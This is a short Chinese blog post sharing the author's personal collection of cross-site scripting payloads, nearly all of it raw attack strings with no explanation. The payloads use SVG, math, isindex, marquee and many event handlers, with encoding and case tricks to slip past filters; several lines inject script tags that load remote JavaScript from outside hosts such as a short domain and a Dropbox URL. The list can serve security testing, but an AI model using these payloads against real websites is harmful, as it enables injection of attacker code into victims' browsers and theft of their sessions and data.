xss playload

Posted 2021-04-29 me记录

xss 

不知道写啥了，最近没人找我问题，不过和尚那边linux服务器又被搞了，感觉可以写一波，但是今天不想写，烦躁，今天我就放出一些小m自己整理的xss playload

<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

<svg/onload=document.body.appendChild(document.createElement(/script/.source)).src='http:/

/M.tv/2Z'>

<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect 

width=100 height=100 /></a> //Chrome 59 で修正

<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')" /><a 

id=x><circle r=100>

<svg/onload=setTimeout('ale'+'rt(1)',0)>

<svg onload='JavascRipT:alert%281%29'>

<svg/onload ="location='jav'+'ascript'+':%2'+'0aler'+'t%20%2'+'81%'+'29'">

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<sVg><scRipt >alert&lpar;1&rpar; {Opera}

<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

<svg><script xlink:href=data&colon;,window.open('https://www.baidu.com/') </script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>

<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>

<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>

<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>

<svg><x><script>alert`1`</x>

<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect 

width=100 height=100 /></a> //Chrome 59 で修正

<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')" /><a 

id=x><circle r=100>

<svg><x><script>alert&grave;1&grave;</x>

<svg><script>0<a></a>;alert(1)</script>

<svg><script>0<a></a>;alert&grave;1&grave;</script>

<svg><script>alert&grave;1&grave;</script>

<svg><script>alert&#40;/1/&#41;</script>

<svg><script>alert&#x28;/1/&#x29;</script>

<svg><script>\u0061\u006c\u0065\u0072\u0074&grave;1&grave;</script>

<svg><fuck><script>\u0061\u006c\u0065\u0072\u0074&grave;1&grave;</fuck>

<isindex type=image src=M onerror=alert`M`>

<BODY ONLOAD=alert('M')>

<isindex x="javascript:" onmouseover="alert('M')">

<isindex onmouseover=alert('M')>

<isindex type=image src=M onerror=alert('M')>

<M/onclick="alert(1)">M

<b/ondrag=alert()>M

<math><a xlink:href=javascript:alert(1)>M

<button/onclick=alert(1) >M</button>

<button onfocus=alert(1) autofocus>

<p/onmouseover=javascript:alert(1); >M</p>

<body onload=alert(1)>

<body 

onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><

br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><

br><br><input autofocus>

<var onmouseover="prompt(1)">KCF</var>

<div/onmouseover='alert(1)'>X

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)">

<marquee onstart="alert('sometext')"></marquee>

<marquee onscroll=alert(1)>

<isindex type=image src=M onerror=alert(1)>

<isindex action=javascript:alert(1) type=image>

<math href="javascript:javascript:alert(1)">CLICKME</math>

<math><y/xlink:href=javascript:alert(51)>test1

<math> <maction actiontype="statusline#http://wangnima.com"

xlink:href="javascript:alert(49)">CLICKME</maction> </math>

<svg onload=alert(1)>

<q/oncut=alert()>M

<s/onclick=alert()>M

<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')"/><a 

id=x><circle r=100>

<form oninput="alert(1)"><input type="range"

<meter onmouseover="alert(1)"

<M contenteditable onblur=alert(1)>lose focus!

<M onclick=alert(1)>click this!

<M oncopy=alert(1)>copy this!

<M oncontextmenu=alert(1)>right click this!

<M oncut=alert(1)>copy this!

<M ondblclick=alert(1)>double click this!

<M ondrag=alert(1)>drag this!

<M contenteditable onfocus=alert(1)>focus this!

<M contenteditable oninput=alert(1)>input here!

<M contenteditable onkeydown=alert(1)>press any key!

<M contenteditable onkeypress=alert(1)>press any key!